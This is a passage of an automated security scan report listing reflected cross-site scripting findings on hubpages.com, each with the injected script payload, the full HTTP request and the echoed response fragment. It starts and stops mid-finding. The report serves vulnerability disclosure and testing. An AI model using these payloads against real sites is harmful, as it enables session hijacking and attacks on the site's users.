GET /topics99f48"><script>alert(1)</script>a4d9d607aff/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics99f48"><script>alert(1)</script>a4d9d607aff/', 'Page not found'); return false;">
...[SNIP]...

1.93. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/topics/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fdc"><script>alert(1)</script>33eb76fcea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:36 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 66444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1', 'Popular Topics on HubPages'); return false;">
...[SNIP]...

1.94. http://hubpages.com/tour/affiliate [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/tour/affiliate

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a6d1"><script>alert(1)</script>cc37e02719e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate', 'Page not found'); return false;">
...[SNIP]...

1.95. http://hubpages.com/tour/affiliate [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/tour/affiliate

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6a5"><script>alert(1)</script>b63f5c1a6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:58 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd', 'HubPages Tour: not found'); return false;">
...[SNIP]...

1.96. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/tour/affiliate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afa9"><script>alert(1)</script>d4f4f14b999 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 11829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1', 'HubPages Affiliate Tour'); return false;">
...[SNIP]...

1.97. http://hubpages.com/user/new/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/user/new/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f280"><script>alert(1)</script>1667bd96a88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user8f280"><script>alert(1)</script>1667bd96a88/new/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:10 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user8f280"><script>alert(1)</script>1667bd96a88/new/', 'Page not found'); return false;">
...[SNIP]...

1.98. http://hubpages.com/user/new/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/user/new/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e18"><script>alert(1)</script>a2b143d7180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new16e18"><script>alert(1)</script>a2b143d7180/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:12 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new16e18"><script>alert(1)</script>a2b143d7180/', 'Page not found'); return false;">
...[SNIP]...

1.99. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/user/new/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efef0"><script>alert(1)</script>856b8cf17c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:59 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 13342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1', 'HubPages New User Signup'); return false;">
...[SNIP]...

1.100. https://hubpages.com/signin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e65d"><script>alert(1)</script>fa4c40e1602db8724 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:51 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Page not found'); return false;">
...[SNIP]...

1.101. https://hubpages.com/signin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb436"><script>alert(1)</script>cb65b8029ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:12 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

1.102. https://hubpages.com/signin/ [explain parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b61c0"><script>alert(1)</script>a1ea5dbbb55 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:50 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.b61c0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea1ea5dbbb55; path=/; domain=.hubpages.com
Content-Length: 7959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.103. https://hubpages.com/signin/ [explain parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23034"><script>alert(1)</script>656acdcaa3ebf7318 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:26 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.23034%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E656acdcaa3ebf7318; path=/; domain=.hubpages.com
Content-Length: 8011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.104. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d52d"><script>alert(1)</script>3ecb0670d8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.105. https://hubpages.com/signin/ [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567de"><script>alert(1)</script>49cf52049d9a5294c was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:15 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.106. https://hubpages.com/signin/ [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bba"><script>alert(1)</script>4d65f9ca019 was submitted in the s parameter. This input was echoed unmodified in the application's response.

